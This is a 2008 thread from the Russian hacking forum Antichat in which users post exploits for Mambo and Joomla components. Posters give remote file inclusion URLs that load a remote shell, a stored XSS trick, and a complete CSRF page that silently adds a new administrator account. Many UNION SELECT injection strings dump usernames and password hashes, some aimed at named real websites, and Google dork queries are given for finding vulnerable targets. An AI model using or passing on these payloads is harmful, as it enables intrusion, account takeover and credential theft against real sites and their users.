Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

11.01.2008, 23:28
|
|
Новичок
Регистрация: 09.01.2008
Сообщений: 2
Провел на форуме: 35941
Репутация:
2
|
|
com_serverstat (компонент Mambo & Joomla)
/Этот компонент используеться для отображения статистики игровых серверов/
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии шаблона administrator/components/com_serverstat/templates/template.game.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Переменная переданная через GET запрос используеться include. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример:
Код:
http://[host]/administrator/components/com_serverstat/templates/template.game.php?mosConfig_absolute_path=[http://file]
...........................................
а также:
в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_serverstat/install.serverstat.php
Пример:
Код:
http://[host]/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=[http://file]
Последний раз редактировалось Proxyr; 11.01.2008 в 23:57..
|
|
|

11.01.2008, 23:44
|
|
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме: 5223479
Репутация:
3813
|
|
com_serverstat (компонент Mambo & Joomla)
Ну тогда ещё упомянем, что там есть и активная XSS - В поле ника игрока. Если не хватит символов для полноценной атаки (не помню сколько в ник влазит), то можно закончить ник вот так: , потом войти ещё одним игроком в игру с ником начинающимся на ну и так далее, до тех пор пока не хватит места...
|
|
|
Joomla 1.0.13 CSRF Vulnerability |

13.01.2008, 21:12
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
Joomla 1.0.13 CSRF Vulnerability
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.
PHP код:
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = 'joe_cool (at) example (dot) com [email concealed]';
var param = {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 1
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
PS добавляет нового админа с заданным логином, пассом и мылом, если кто не понял...
__________________
|
|
|
JoomlaFlash Component Multiple Remote File Inclusion |

22.01.2008, 03:33
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
JoomlaFlash Component Multiple Remote File Inclusion
Flash Component Multiple Remote File Inclusion
Vulnerable: 2.5.1, 2.5.2
Exploit:
Код:
http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_
flash_uploader.php?mosConfig_absolute_path=shell?
http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.jooml
a_flash_uploader.php?mosConfig_absolute_path=shell?
|
|
|

23.01.2008, 17:54
|
|
Banned
Регистрация: 18.01.2008
Сообщений: 6
Провел на форуме: 29103
Репутация:
25
|
|
Joomla Component NeoRecruit
SQL:
http://[сайт]/index.php?option=com_neorecruit&task=offer_view&id =[SQL инъекция]
Пример:
Код:
http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=36985
2+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25+FROM+jos_users--
Joomla Component Nice Talk
SQL:
http://[сайт]/index.php?option=com_nicetalk&tagid=[SQL инъекция]
Пример:
Код:
http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+
SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15,16,17,18+FROM+jos_use
rs--
Joomla перфикс jos_
Mamba перфикс mos_
|
|
|
Joomla Multiple Remote File Inclusion |

24.01.2008, 18:50
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
Joomla Multiple Remote File Inclusion
Remote File Inclusion
Vulnerable: com_panoramic version 1.0
PoC:
Код:
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]
Remote File Inclusion
Vulnerable: MOSMediaLite451
PoC:
Код:
http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]
Последний раз редактировалось iddqd; 24.01.2008 в 19:00..
|
|
|

30.01.2008, 18:57
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме: 5516499
Репутация:
3702
|
|
Mambo Component Newsletter (listid) Remote SQL Injection
SQL Injection:
Код:
index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:
Код:
allinurl: "com_newsletter"
Mambo Component Fq (listid) Remote SQL Injection
SQL Injection:
Код:
index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:
Mambo Component MaMML (listid) Remote SQL Injection
SQL Injection:
Код:
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:
Код:
allinurl: "com_mamml"
Mambo Component Glossary 2.0 (catid) SQL Injection
SQL Injection:
Код:
index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users-
Для поиска вводим:
Код:
allinurl: "com_glossary"
(c)
|
|
|

31.01.2008, 02:15
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме: 5516499
Репутация:
3702
|
|
Mambo Component musepoes (aid) Remote SQL Injection
SQL Injection:
Код:
index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
Для поиска вводим:
Код:
allinurl: "com_musepoes"
Mambo Component buslicense (aid) Remote SQL Injection
SQL Injection:
Код:
index.php?option=com_buslicense§ionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*
Для поиска вводим:
Код:
allinurl: "com_buslicense"
Mambo Component Recipes 1.00 (id) Remote SQL Injection
SQL Injection:
Код:
index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*
Для поиска вводим:
Код:
allinurl: "com_recipes"
Mambo Component jokes 1.0 (cat) SQL Injection
SQL Injection:
Код:
index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
Для поиска вводим:
Код:
allinurl: "com_jokes"
Mambo Component EstateAgent 0.1 Remote SQL Injection
SQL Injection:
Код:
index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN
Для поиска вводим:
Код:
allinurl: "com_estateagent"
(c)
|
|
|

01.02.2008, 10:07
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме: 4038468
Репутация:
1224
|
|
Component Catalogshop 1.0b1 SQL Injection Vulnerability
inurl: index.php?option=com_catalogshop
Инъекция:
Код:
index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
Component AkoGallery 2.5b SQL Injection Vulnerability
inurl: index.php?option=com_akogallery
Инъекция:
Код:
index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
(с) hackturkiye.com
|
|
|

01.02.2008, 17:34
|
|
Участник форума
Регистрация: 27.05.2007
Сообщений: 237
Провел на форуме: 2256445
Репутация:
767
|
|
SQL-инъекция в Mambo Component Restaurant
Программа: Mambo Component Restaurant 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
Код:
index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/* */union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/* */from/**/mos_users/*
(c)
Последний раз редактировалось Mr. P.S.; 01.02.2008 в 18:25..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|